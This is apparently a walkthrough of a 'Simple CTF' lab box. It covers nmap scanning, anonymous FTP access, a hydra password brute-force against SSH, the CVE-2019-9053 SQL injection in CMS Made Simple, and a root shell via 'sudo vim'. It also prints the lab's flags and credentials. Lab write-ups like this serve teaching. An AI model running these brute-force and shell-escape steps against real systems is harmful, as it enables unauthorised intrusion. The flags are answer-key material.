Simple CTF

TARGET IP --> 10.10.120.214

Task 1: How many services are running under port 1000?

  • Utilize nmap for a quick scan.

nmap [Target IP]

  • It appears that two services are running. FTP and HTTP.

nmap -sV -sC [Target IP]

  • Looks like Anonymous login is allowed for FTP and SSH is running on port 2222.

Task 2: What is running on the higher port?

  • After running a script scan and version scan on nmap I found that Port 2222 is running SSH. Check the notes above.

Task 3: What's the CVE you're using against the application?

  • First tried out the web server on port 80. Looks like the default Apache web server page.

  • Checking out Wappalyzer shows apache web server on version 2.4.18 and Ubuntu as the OS.

  • Next I checked out the robots.txt page that was discovered during the nmap scan.

  • I found a directory named /openemr-5_0_1_3, and a possible user named mike.

    • The directory isn't there.

  • Decided to log into FTP service with anonymous account. Browsed around and found a file.

ftp [Target IP]

  • Use the get command to download the file.

get ForMitch.txt

  • Cat the file to view it.

cat ForMitch.txt

  • The system user password is really weak.

  • Let's do a hydra attack on the SSH server.

hydra -V -l mitch -P rockyou.txt ssh://[Target IP]:2222

  • It kicked back credentials for Mitch.

    • mitch:secret

  • Now let's log into SSH account with Mitch's credentials:

ssh -p 2222 mitch@[Target IP]

  • The answer to this one was actually gaining access to mitch's account through the web server instead of SSH. To do this you can find a login page to the webserver by using gobuster.

  • I actually had to look up another person's write-up to see how they did it.

  • This will take you to a login page using CMS Made Simple 2.2.8.

  • Googling vulnerabilities for this application shows that there is one on exploit DB.

  • This shows a CVE-2019-9053

  • You can use this POC to grab a salted/hashed password from the CMS. You can then use hashcat to crack the password for Mitch.

Task 4: To what kind of vulnerability is the application vulnerable?

  • Checking out the exploit DB for the CVE, shows this application is susceptible to SQL Injection or SQLI.

Task 5: What's the password?

  • Based on hydra attack from Task 3, Mitch's password is secret.

Task 6: Where can you log in with the details obtained?

  • We know we can log into SSH on port 2222 with the credentials.

Task 7: What's the user flag?

  • Let's cat the file on the home directory for mitch.

cat /home/mitch/user.txt

  • G00d j0b, keep up!

Task 8: Is there any other user in the home directory? What's its name?

  • Cd out of mitch's directory into the the /home directory and we will find another user called sunbath.

Task 9: What can you leverage to spawn a privileged shell?

  • Once logged in as mitch check what sudo privileges you have.

sudo -l

  • This shows that I have root privileges with VIM.

  • Next, I'll go to GTFOBins to find privilege escalation.

  • So let's try the command to gain root privileges.

sudo vim -c ':!/bin/sh'

  • And now you should have root privileges.

Task 10: What's the root flag?

  • Once you have root access, cat the root.txt file.

cat /root/root.txt

  • W3ll d0n3. You made it!

PreviousRootMe

Last updated